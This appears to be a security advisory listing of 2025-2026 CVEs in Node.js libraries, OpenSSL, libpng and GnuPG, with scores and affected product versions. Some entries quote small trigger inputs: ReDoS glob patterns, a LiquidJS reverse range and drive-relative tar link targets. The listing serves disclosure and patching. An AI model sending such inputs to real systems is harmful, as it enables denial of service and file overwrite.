    CVE-2026-33941Handlebars provides the power necessary to let users build semantic templates. In versions 4.0.0 through 4.7.8, the Handlebars CLI precompiler (`bin/handlebars` / `lib/precompiler.js`) concatenates user-controlled strings — template file names and several CLI options — directly into the JavaScript it emits, without any escaping or sanitization. An attacker who can influence template filenames or CLI arguments can inject arbitrary JavaScript that executes when the generated bundle is loaded in Node.js or a browser. Version 4.7.9 fixes the issue. Some workarounds are available. First, validate all CLI inputs before invoking the precompiler. Reject filenames and option values that contain characters with JavaScript string-escaping significance (`"`, `'`, `;`, etc.). Second, use a fixed, trusted namespace string passed via a configuration file rather than command-line arguments in automated pipelines. Third, run the precompiler in a sandboxed environment (container with no write access to sensitive paths) to limit the impact of successful exploitation. Fourth, audit template filenames in any repository or package that is consumed by an automated build pipeline.HIGH

    NVD: 8.2

    RedHat: 8.2

    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 9.3.0
    • 9.2.8
    • 9.4.0
    • 9.3.4
    • 8.19.15
    CVE-2026-33891Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.4.0, a Denial of Service (DoS) vulnerability exists in the node-forge library due to an infinite loop in the BigInteger.modInverse() function (inherited from the bundled jsbn library). When modInverse() is called with a zero value as input, the internal Extended Euclidean Algorithm enters an unreachable exit condition, causing the process to hang indefinitely and consume 100% CPU. Version 1.4.0 patches the issue.HIGH

    NVD: n/a

    RedHat: 7.5

    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 9.3.0
    • 9.2.8
    • 9.4.0
    • 9.3.4
    • 8.19.15
    CVE-2026-33894Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.4.0, RSASSA PKCS#1 v1.5 signature verification accepts forged signatures for low public exponent keys (e=3). Attackers can forge signatures by stuffing “garbage” bytes within the ASN structure in order to construct a signature that passes verification, enabling Bleichenbacher style forgery. This issue is similar to CVE-2022-24771, but adds bytes in an addition field within the ASN structure, rather than outside of it. Additionally, forge does not validate that signatures include a minimum of 8 bytes of padding as defined by the specification, providing attackers additional space to construct Bleichenbacher forgeries. Version 1.4.0 patches the issue.HIGH

    NVD: n/a

    RedHat: 7.5

    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 9.3.0
    • 9.2.8
    • 9.4.0
    • 9.3.4
    • 8.19.15
    CVE-2026-33895Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.4.0, Ed25519 signature verification accepts forged non-canonical signatures where the scalar S is not reduced modulo the group order (`S >= L`). A valid signature and its `S + L` variant both verify in forge, while Node.js `crypto.verify` (OpenSSL-backed) rejects the `S + L` variant, as defined by the specification. This class of signature malleability has been exploited in practice to bypass authentication and authorization logic (see CVE-2026-25793, CVE-2022-35961). Applications relying on signature uniqueness (i.e., dedup by signature bytes, replay tracking, signed-object canonicalization checks) may be bypassed. Version 1.4.0 patches the issue.HIGH

    NVD: n/a

    RedHat: 7.5

    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 9.3.0
    • 9.2.8
    • 9.4.0
    • 9.3.4
    • 8.19.15
    CVE-2026-33896Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.4.0, `pki.verifyCertificateChain()` does not enforce RFC 5280 basicConstraints requirements when an intermediate certificate lacks both the `basicConstraints` and `keyUsage` extensions. This allows any leaf certificate (without these extensions) to act as a CA and sign other certificates, which node-forge will accept as valid. Version 1.4.0 patches the issue.HIGH

    NVD: 9.1

    RedHat: 7.4

    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 9.3.0
    • 9.2.8
    • 9.4.0
    • 9.3.4
    • 8.19.15
    CVE-2026-4926Impact: A bad regular expression is generated any time you have multiple sequential optional groups (curly brace syntax), such as `{a}{b}{c}:z`. The generated regex grows exponentially with the number of groups, causing denial of service. Patches: Fixed in version 8.4.0. Workarounds: Limit the number of sequential optional groups in route patterns. Avoid passing user-controlled input as route patterns.HIGH

    NVD: n/a

    RedHat: 7.5

    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 9.3.0
    • 9.2.8
    • 9.4.0
    • 9.3.4
    • 9.0.8
    • 9.0.7
    • 9.0.6
    CVE-2026-33671Picomatch is a glob matcher written JavaScript. Versions prior to 4.0.4, 3.0.2, and 2.3.2 are vulnerable to Regular Expression Denial of Service (ReDoS) when processing crafted extglob patterns. Certain patterns using extglob quantifiers such as `+()` and `*()`, especially when combined with overlapping alternatives or nested extglobs, are compiled into regular expressions that can exhibit catastrophic backtracking on non-matching input. Applications are impacted when they allow untrusted users to supply glob patterns that are passed to `picomatch` for compilation or matching. In those cases, an attacker can cause excessive CPU consumption and block the Node.js event loop, resulting in a denial of service. Applications that only use trusted, developer-controlled glob patterns are much less likely to be exposed in a security-relevant way. This issue is fixed in picomatch 4.0.4, 3.0.2 and 2.3.2. Users should upgrade to one of these versions or later, depending on their supported release line. If upgrading is not immediately possible, avoid passing untrusted glob patterns to `picomatch`. Possible mitigations include disabling extglob support for untrusted patterns by using `noextglob: true`, rejecting or sanitizing patterns containing nested extglobs or extglob quantifiers such as `+()` and `*()`, enforcing strict allowlists for accepted pattern syntax, running matching in an isolated worker or separate process with time and resource limits, and applying application-level request throttling and input validation for any endpoint that accepts glob patterns.HIGH

    NVD: n/a

    RedHat: 6.5

    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 9.3.0
    • 9.2.8
    • 9.4.0
    • 9.3.4
    • 8.19.15
    CVE-2025-12735The expr-eval library is a JavaScript expression parser and evaluator designed to safely evaluate mathematical expressions with user-defined variables. However, due to insufficient input validation, an attacker can pass a crafted context object or use MEMBER of the context object into the evaluate() function and trigger arbitrary code execution.HIGH

    NVD: n/a

    RedHat: 9.8

    • 9.2.4
    • 9.2.3
    • 9.2.2
    • 9.2.1
    • 9.2.0
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    CVE-2025-13204npm package `expr-eval` is vulnerable to Prototype Pollution. An attacker with access to express eval interface can use JavaScript prototype-based inheritance model to achieve arbitrary code execution. The npm expr-eval-fork package resolves this issue.HIGH

    NVD: n/a

    RedHat: 7.3

    • 9.2.4
    • 9.2.3
    • 9.2.2
    • 9.2.1
    • 9.2.0
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    CVE-2025-68665LangChain is a framework for building LLM-powered applications. Prior to @langchain/core versions 0.3.80 and 1.1.8, and prior to langchain versions 0.3.37 and 1.2.3, a serialization injection vulnerability exists in LangChain JS's toJSON() method (and subsequently when string-ifying objects using JSON.stringify(). The method did not escape objects with 'lc' keys when serializing free-form data in kwargs. The 'lc' key is used internally by LangChain to mark serialized objects. When user-controlled data contains this key structure, it is treated as a legitimate LangChain object during deserialization rather than plain user data. This issue has been patched in @langchain/core versions 0.3.80 and 1.1.8, and langchain versions 0.3.37 and 1.2.3HIGH

    NVD: 9.1

    RedHat: 8.6

    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 9.3.0
    • 9.2.4
    • 9.4.0
    • 9.3.4
    • 9.2.8
    • 9.2.7
    • 9.2.6
    CVE-2026-35525LiquidJS is a Shopify / GitHub Pages compatible template engine in pure JavaScript. Prior to 10.25.3, for {% include %}, {% render %}, and {% layout %}, LiquidJS checks whether the candidate path is inside the configured partials or layouts roots before reading it. That check is path-based, not realpath-based. Because of that, a file like partials/link.liquid passes the directory containment check as long as its pathname is under the allowed root. If link.liquid is actually a symlink to a file outside the allowed root, the filesystem follows the symlink when the file is opened and LiquidJS renders the external target. So the restriction is applied to the path string that was requested, not to the file that is actually read. This matters in environments where an attacker can place templates or otherwise influence files under a trusted template root, including uploaded themes, extracted archives, mounted content, or repository-controlled template trees. This vulnerability is fixed in 10.25.3.HIGH

    NVD: 7.5

    RedHat: n/a

    • 9.3.3
    • 9.3.2
    • 9.3.1
    • 9.3.0
    • 9.4.0
    • 9.3.4
    • 9.2.8
    • 9.2.7
    • 9.2.6
    CVE-2026-4111A flaw was identified in the RAR5 archive decompression logic of the libarchive library, specifically within the archive_read_data() processing path. When a specially crafted RAR5 archive is processed, the decompression routine may enter a state where internal logic prevents forward progress. This condition results in an infinite loop that continuously consumes CPU resources. Because the archive passes checksum validation and appears structurally valid, affected applications cannot detect the issue before processing. This can allow attackers to cause persistent denial-of-service conditions in services that automatically process archives.HIGH

    NVD: n/a

    RedHat: 7.5

    • 9.3.2
    • 9.3.1
    • 9.3.0
    • 9.2.7
    • 9.2.6
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.2.8
    • 8.19.15
    CVE-2026-33036fast-xml-parser allows users to process XML from JS object without C/C++ based libraries or callbacks. Versions 4.0.0-beta.3 through 5.5.5 contain a bypass vulnerability where numeric character references (&#NNN;, &#xHH;) and standard XML entities completely evade the entity expansion limits (e.g., maxTotalExpansions, maxExpandedLength) added to fix CVE-2026-26278, enabling XML entity expansion Denial of Service. The root cause is that replaceEntitiesValue() in OrderedObjParser.js only enforces expansion counting on DOCTYPE-defined entities while the lastEntities loop handling numeric/standard entities performs no counting at all. An attacker supplying 1M numeric entity references like &#65; can force ~147MB of memory allocation and heavy CPU usage, potentially crashing the process—even when developers have configured strict limits. This issue has been fixed in version 5.5.6.HIGH

    NVD: n/a

    RedHat: 7.5

    • 9.3.2
    • 9.3.1
    • 9.3.0
    • 9.2.7
    • 9.2.6
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.2.8
    • 8.19.15
    CVE-2026-30952liquidjs is a Shopify / GitHub Pages compatible template engine in pure JavaScript. Prior to 10.25.0, the layout, render, and include tags allow arbitrary file access via absolute paths (either as string literals or through Liquid variables, the latter require dynamicPartials: true, which is the default). This poses a security risk when malicious users are allowed to control the template content or specify the filepath to be included as a Liquid variable. This vulnerability is fixed in 10.25.0.HIGH

    NVD: 7.5

    RedHat: n/a

    • 9.3.2
    • 9.3.1
    • 9.3.0
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.2.8
    • 9.2.7
    CVE-2026-33285LiquidJS is a Shopify / GitHub Pages compatible template engine in pure JavaScript. Prior to version 10.25.1, LiquidJS's `memoryLimit` security mechanism can be completely bypassed by using reverse range expressions (e.g., `(100000000..1)`), allowing an attacker to allocate unlimited memory. Combined with a string flattening operation (e.g., `replace` filter), this causes a V8 Fatal error that crashes the Node.js process, resulting in complete denial of service from a single HTTP request. Version 10.25.1 patches the issue.HIGH

    NVD: n/a

    RedHat: n/a

    • 9.3.2
    • 9.3.1
    • 9.3.0
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.2.8
    • 9.2.7
    CVE-2026-33287LiquidJS is a Shopify / GitHub Pages compatible template engine in pure JavaScript. Prior to version 10.25.1, the `replace_first` filter in LiquidJS uses JavaScript's `String.prototype.replace()` which interprets `$&` as a back reference to the matched substring. The filter only charges `memoryLimit` for the input string length, not the amplified output. An attacker can achieve exponential memory amplification (up to 625,000:1) while staying within the `memoryLimit` budget, leading to denial of service. Version 10.25.1 patches the issue.HIGH

    NVD: n/a

    RedHat: n/a

    • 9.3.2
    • 9.3.1
    • 9.3.0
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.2.8
    • 9.2.7
    CVE-2025-68154systeminformation is a System and OS information library for node.js. In versions prior to 5.27.14, the `fsSize()` function in systeminformation is vulnerable to OS command injection on Windows systems. The optional `drive` parameter is directly concatenated into a PowerShell command without sanitization, allowing arbitrary command execution when user-controlled input reaches this function. The actual exploitability depends on how applications use this function. If an application does not pass user-controlled input to `fsSize()`, it is not vulnerable. Version 5.27.14 contains a patch.HIGH

    NVD: n/a

    RedHat: 8.1

    • 9.3.2
    • 9.3.1
    • 9.3.0
    • 9.2.7
    • 9.2.6
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.2.8
    • 9.0.4
    CVE-2026-25646LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. Prior to 1.6.55, an out-of-bounds read vulnerability exists in the png_set_quantize() API function. When the function is called with no histogram and the number of colors in the palette is more than twice the maximum supported by the user's display, certain palettes will cause the function to enter into an infinite loop that reads past the end of an internal heap-allocated buffer. The images that trigger this vulnerability are valid per the PNG specification. This vulnerability is fixed in 1.6.55.HIGH

    NVD: 8.1

    RedHat: 7

    • 9.3.1
    • 9.3.0
    • 9.2.6
    • 9.2.5
    • 9.2.4
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.2.8
    CVE-2026-29087@hono/node-server allows running the Hono application on Node.js. Prior to version 1.19.10, when using @hono/node-server's static file serving together with route-based middleware protections (e.g. protecting /admin/*), inconsistent URL decoding can allow protected static resources to be accessed without authorization. In particular, paths containing encoded slashes (%2F) may be evaluated differently by routing/middleware matching versus static file path resolution, enabling a bypass where middleware does not run but the static file is still served. This issue has been patched in version 1.19.10.HIGH

    NVD: n/a

    RedHat: n/a

    • 9.3.1
    • 9.3.0
    • 9.2.6
    • 9.2.5
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.2.8
    CVE-2026-25536MCP TypeScript SDK is the official TypeScript SDK for Model Context Protocol servers and clients. From version 1.10.0 to 1.25.3, cross-client response data leak when a single McpServer/Server and transport instance is reused across multiple client connections, most commonly in stateless StreamableHTTPServerTransport deployments. This issue has been patched in version 1.26.0.HIGH

    NVD: n/a

    RedHat: 7.1

    • 9.3.1
    • 9.3.0
    • 9.2.6
    • 9.2.5
    • 9.2.4
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.2.8
    CVE-2026-25639Axios is a promise based HTTP client for the browser and Node.js. Prior to versions 0.30.3 and 1.13.5, the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service. This vulnerability is fixed in versions 0.30.3 and 1.13.5.HIGH

    NVD: n/a

    RedHat: 7.5

    • 9.3.1
    • 9.3.0
    • 9.2.6
    • 9.2.5
    • 9.2.4
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.2.8
    CVE-2026-26996minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Versions 10.2.0 and below are vulnerable to Regular Expression Denial of Service (ReDoS) when a glob pattern contains many consecutive * wildcards followed by a literal character that doesn't appear in the test string. Each * compiles to a separate [^/]*? regex group, and when the match fails, V8's regex engine backtracks exponentially across all possible splits. The time complexity is O(4^N) where N is the number of * characters. With N=15, a single minimatch() call takes ~2 seconds. With N=34, it hangs effectively forever. Any application that passes user-controlled strings to minimatch() as the pattern argument is vulnerable to DoS. This issue has been fixed in version 10.2.1.HIGH

    NVD: 7.5

    RedHat: 6.5

    • 9.3.1
    • 9.3.0
    • 9.2.6
    • 9.2.5
    • 9.2.4
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.2.8
    CVE-2026-27903minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3, `matchOne()` performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent `**` (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where `n` is the number of path segments and `k` is the number of globstars. With k=11 and n=30, a call to the default `minimatch()` API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No memoization or call budget exists to bound this behavior. Any application where an attacker can influence the glob pattern passed to `minimatch()` is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments (ESLint, Webpack, Rollup config), multi-tenant systems where one tenant configures glob-based rules that run in a shared process, admin or developer interfaces that accept ignore-rule or filter configuration as globs, and CI/CD pipelines that evaluate user-submitted config files containing glob patterns. An attacker who can place a crafted pattern into any of these paths can stall the Node.js event loop for tens of seconds per invocation. The pattern is 56 bytes for a 5-second stall and does not require authentication in contexts where pattern input is part of the feature. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3 fix the issue.HIGH

    NVD: n/a

    RedHat: 5.9

    • 9.3.1
    • 9.3.0
    • 9.2.6
    • 9.2.5
    • 9.2.4
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.2.8
    CVE-2026-27904minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4, nested `*()` extglobs produce regexps with nested unbounded quantifiers (e.g. `(?:(?:a|b)*)*`), which exhibit catastrophic backtracking in V8. With a 12-byte pattern `*(*(*(a|b)))` and an 18-byte non-matching input, `minimatch()` stalls for over 7 seconds. Adding a single nesting level or a few input characters pushes this to minutes. This is the most severe finding: it is triggered by the default `minimatch()` API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects `+()` extglobs equally. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4 fix the issue.HIGH

    NVD: n/a

    RedHat: 6.5

    • 9.3.1
    • 9.3.0
    • 9.2.6
    • 9.2.5
    • 9.2.4
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.2.8
    CVE-2026-29786node-tar is a full-featured Tar for Node.js. Prior to version 7.5.10, tar can be tricked into creating a hardlink that points outside the extraction directory by using a drive-relative link target such as C:../target.txt, which enables file overwrite outside cwd during normal tar.x() extraction. This issue has been patched in version 7.5.10.HIGH

    NVD: 6.3

    RedHat: 8.6

    • 9.3.1
    • 9.3.0
    • 9.2.6
    • 9.2.5
    • 9.2.4
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.2.8
    CVE-2026-31802node-tar is a full-featured Tar for Node.js. Prior to version 7.5.11, tar (npm) can be tricked into creating a symlink that points outside the extraction directory by using a drive-relative symlink target such as C:../../../target.txt, which enables file overwrite outside cwd during normal tar.x() extraction. This vulnerability is fixed in 7.5.11.HIGH

    NVD: 5.5

    RedHat: 6.2

    • 9.3.1
    • 9.3.0
    • 9.2.6
    • 9.2.5
    • 9.2.4
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.2.8
    CVE-2025-6176Scrapy versions up to 2.13.2 are vulnerable to a denial of service (DoS) attack due to a flaw in its brotli decompression implementation. The protection mechanism against decompression bombs fails to mitigate the brotli variant, allowing remote servers to crash clients with less than 80GB of available memory. This occurs because brotli can achieve extremely high compression ratios for zero-filled data, leading to excessive memory consumption during decompression.HIGH

    NVD: n/a

    RedHat: 7.5

    • 9.3.0
    • 9.2.5
    • 9.2.4
    • 9.2.3
    • 9.2.2
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    CVE-2025-15467Issue summary: Parsing CMS AuthEnvelopedData or EnvelopedData message with maliciously crafted AEAD parameters can trigger a stack buffer overflow. Impact summary: A stack buffer overflow may lead to a crash, causing Denial of Service, or potentially remote code execution. When parsing CMS (Auth)EnvelopedData structures that use AEAD ciphers such as AES-GCM, the IV (Initialization Vector) encoded in the ASN.1 parameters is copied into a fixed-size stack buffer without verifying that its length fits the destination. An attacker can supply a crafted CMS message with an oversized IV, causing a stack-based out-of-bounds write before any authentication or tag verification occurs. Applications and services that parse untrusted CMS or PKCS#7 content using AEAD ciphers (e.g., S/MIME (Auth)EnvelopedData with AES-GCM) are vulnerable. Because the overflow occurs prior to authentication, no valid key material is required to trigger it. While exploitability to remote code execution depends on platform and toolchain mitigations, the stack-based write primitive represents a severe risk. The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue, as the CMS implementation is outside the OpenSSL FIPS module boundary. OpenSSL 3.6, 3.5, 3.4, 3.3 and 3.0 are vulnerable to this issue. OpenSSL 1.1.1 and 1.0.2 are not affected by this issue.HIGH

    NVD: n/a

    RedHat: 9.8

    • 9.3.0
    • 9.2.5
    • 9.2.4
    • 9.2.3
    • 9.2.2
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    CVE-2026-25128fast-xml-parser allows users to validate XML, parse XML to JS object, or build XML from JS object without C/C++ based libraries and no callback. In versions 5.0.9 through 5.3.3, a RangeError vulnerability exists in the numeric entity processing of fast-xml-parser when parsing XML with out-of-range entity code points (e.g., `&#9999999;` or `&#xFFFFFF;`). This causes the parser to throw an uncaught exception, crashing any application that processes untrusted XML input. Version 5.3.4 fixes the issue.HIGH

    NVD: n/a

    RedHat: 5.3

    • 9.3.0
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    CVE-2026-26278fast-xml-parser allows users to validate XML, parse XML to JS object, or build XML from JS object without C/C++ based libraries and no callback. In versions 4.1.3 through 5.3.5, the XML parser can be forced to do an unlimited amount of entity expansion. With a very small XML input, it’s possible to make the parser spend seconds or even minutes processing a single request, effectively freezing the application. Version 5.3.6 fixes the issue. As a workaround, avoid using DOCTYPE parsing by `processEntities: false` option.HIGH

    NVD: n/a

    RedHat: 7.5

    • 9.3.0
    • 9.2.5
    • 9.2.4
    • 9.2.3
    • 9.2.2
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    CVE-2026-24842node-tar,a Tar for Node.js, contains a vulnerability in versions prior to 7.5.7 where the security check for hardlink entries uses different path resolution semantics than the actual hardlink creation logic. This mismatch allows an attacker to craft a malicious TAR archive that bypasses path traversal protections and creates hardlinks to arbitrary files outside the extraction directory. Version 7.5.7 contains a fix for the issue.HIGH

    NVD: n/a

    RedHat: 8.2

    • 9.3.0
    • 9.2.5
    • 9.2.4
    • 9.2.3
    • 9.2.2
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    CVE-2026-26960node-tar is a full-featured Tar for Node.js. When using default options in versions 7.5.7 and below, an attacker-controlled archive can create a hardlink inside the extraction directory that points to a file outside the extraction root, enabling arbitrary file read and write as the extracting user. Severity is high because the primitive bypasses path protections and turns archive extraction into a direct filesystem access primitive. This issue has been fixed in version 7.5.8.HIGH

    NVD: 7.1

    RedHat: 7.1

    • 9.3.0
    • 9.2.5
    • 9.2.4
    • 9.2.3
    • 9.2.2
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    CVE-2025-68973In GnuPG before 2.4.9, armor_filter in g10/armor.c has two increments of an index variable where one is intended, leading to an out-of-bounds write for crafted input. (For ExtendedLTS, 2.2.51 and later are fixed versions.)HIGH

    NVD: 7

    RedHat: 7.8

    • 9.2.4
    • 9.2.3
    • 9.2.2
    • 9.2.1
    • 9.2.0
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    CVE-2026-0621Anthropic's MCP TypeScript SDK versions up to and including 1.25.1 contain a regular expression denial of service (ReDoS) vulnerability in the UriTemplate class when processing RFC 6570 exploded array patterns. The dynamically generated regular expression used during URI matching contains nested quantifiers that can trigger catastrophic backtracking on specially crafted inputs, resulting in excessive CPU consumption. An attacker can exploit this by supplying a malicious URI that causes the Node.js process to become unresponsive, leading to a denial of service.HIGH

    NVD: 7.5

    RedHat: n/a

    • 9.2.4
    • 9.2.3
    • 9.2.2
    • 9.2.1
    • 9.2.0
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    CVE-2026-23745node-tar is a Tar for Node.js. The node-tar library (<= 7.5.2) fails to sanitize the linkpath of Link (hardlink) and SymbolicLink entries when preservePaths is false (the default secure behavior). This allows malicious archives to bypass the extraction root restriction, leading to Arbitrary File Overwrite via hardlinks and Symlink Poisoning via absolute symlink targets. This vulnerability is fixed in 7.5.3.HIGH

    NVD: 6.1

    RedHat: 8.2

    • 9.2.4
    • 9.2.3
    • 9.2.2
    • 9.2.1
    • 9.2.0
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    CVE-2026-23950node-tar,a Tar for Node.js, has a race condition vulnerability in versions up to and including 7.5.3. This is due to an incomplete handling of Unicode path collisions in the `path-reservations` system. On case-insensitive or normalization-insensitive filesystems (such as macOS APFS, In which it has been tested), the library fails to lock colliding paths (e.g., `ß` and `ss`), allowing them to be processed in parallel. This bypasses the library's internal concurrency safeguards and permits Symlink Poisoning attacks via race conditions. The library uses a `PathReservations` system to ensure that metadata checks and file operations for the same path are serialized. This prevents race conditions where one entry might clobber another concurrently. This is a Race Condition which enables Arbitrary File Overwrite. This vulnerability affects users and systems using node-tar on macOS (APFS/HFS+). Because of using `NFD` Unicode normalization (in which `ß` and `ss` are different), conflicting paths do not have their order properly preserved under filesystems that ignore Unicode normalization (e.g., APFS (in which `ß` causes an inode collision with `ss`)). This enables an attacker to circumvent internal parallelization locks (`PathReservations`) using conflicting filenames within a malicious tar archive. The patch in version 7.5.4 updates `path-reservations.js` to use a normalization form that matches the target filesystem's behavior (e.g., `NFKD`), followed by first `toLocaleLowerCase('en')` and then `toLocaleUpperCase('en')`. As a workaround, users who cannot upgrade promptly, and who are programmatically using `node-tar` to extract arbitrary tarball data should filter out all `SymbolicLink` entries (as npm does) to defend against arbitrary file writes via this file system entry name collision issue.HIGH

    NVD: 5.9

    RedHat: 8.8

    • 9.2.4
    • 9.2.3
    • 9.2.2
    • 9.2.1
    • 9.2.0
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    CVE-2025-64720LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. From version 1.6.0 to before 1.6.51, an out-of-bounds read vulnerability exists in png_image_read_composite when processing palette images with PNG_FLAG_OPTIMIZE_ALPHA enabled. The palette compositing code in png_init_read_transformations incorrectly applies background compositing during premultiplication, violating the invariant component ≤ alpha × 257 required by the simplified PNG API. This issue has been patched in version 1.6.51.HIGH

    NVD: n/a

    RedHat: 7.1

    • 9.2.3
    • 9.2.2
    • 9.2.1
    • 9.2.0
    • 9.1.9
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    CVE-2025-65018LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. From version 1.6.0 to before 1.6.51, there is a heap buffer overflow vulnerability in the libpng simplified API function png_image_finish_read when processing 16-bit interlaced PNGs with 8-bit output format. Attacker-crafted interlaced PNG files cause heap writes beyond allocated buffer bounds. This issue has been patched in version 1.6.51.HIGH

    NVD: n/a

    RedHat: 7.1

    • 9.2.3
    • 9.2.2
    • 9.2.1
    • 9.2.0
    • 9.1.9
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    CVE-2025-66414MCP TypeScript SDK is the official TypeScript SDK for Model Context Protocol servers and clients. Prior to 1.24.0, The Model Context Protocol (MCP) TypeScript SDK does not enable DNS rebinding protection by default for HTTP-based servers. When an HTTP-based MCP server is run on localhost without authentication with StreamableHTTPServerTransport or SSEServerTransport and has not enabled enableDnsRebindingProtection, a malicious website could exploit DNS rebinding to bypass same-origin policy restrictions and send requests to the local MCP server. This could allow an attacker to invoke tools or access resources exposed by the MCP server on behalf of the user in those limited circumstances. Note that running HTTP-based MCP servers locally without authentication is not recommended per MCP security best practices. This issue does not affect servers using stdio transport. This vulnerability is fixed in 1.24.0.HIGH

    NVD: 8.1

    RedHat: n/a

    • 9.2.2
    • 9.2.1
    • 9.2.0
    • 9.1.8
    • 9.1.7
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    CVE-2025-65945auth0/node-jws is a JSON Web Signature implementation for Node.js. In versions 3.2.2 and earlier and version 4.0.0, auth0/node-jws has an improper signature verification vulnerability when using the HS256 algorithm under specific conditions. Applications are affected when they use the jws.createVerify() function for HMAC algorithms and use user-provided data from the JSON Web Signature protected header or payload in HMAC secret lookup routines, which can allow attackers to bypass signature verification. This issue has been patched in versions 3.2.3 and 4.0.1.HIGH

    NVD: n/a

    RedHat: 7.5

    • 9.2.2
    • 9.2.1
    • 9.2.0
    • 9.1.8
    • 9.1.7
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    CVE-2025-12816An interpretation-conflict (CWE-436) vulnerability in node-forge versions 1.3.1 and earlier enables unauthenticated attackers to craft ASN.1 structures to desynchronize schema validations, yielding a semantic divergence that may bypass downstream cryptographic verifications and security decisions.HIGH

    NVD: n/a

    RedHat: 8.7

    • 9.2.2
    • 9.2.1
    • 9.2.0
    • 9.1.8
    • 9.1.7
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    CVE-2025-66031Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. An Uncontrolled Recursion vulnerability in node-forge versions 1.3.1 and below enables remote, unauthenticated attackers to craft deep ASN.1 structures that trigger unbounded recursive parsing. This leads to a Denial-of-Service (DoS) via stack exhaustion when parsing untrusted DER inputs. This issue has been patched in version 1.3.2.HIGH

    NVD: 7.5

    RedHat: 5.3

    • 9.2.2
    • 9.2.1
    • 9.2.0
    • 9.1.8
    • 9.1.7
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    CVE-2025-14874A flaw was found in Nodemailer. This vulnerability allows a denial of service (DoS) via a crafted email address header that triggers infinite recursion in the address parser.HIGH

    NVD: 7.5

    RedHat: 7.5

    • 9.2.2
    • 9.2.1
    • 9.2.0
    • 9.1.8
    • 9.1.7
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
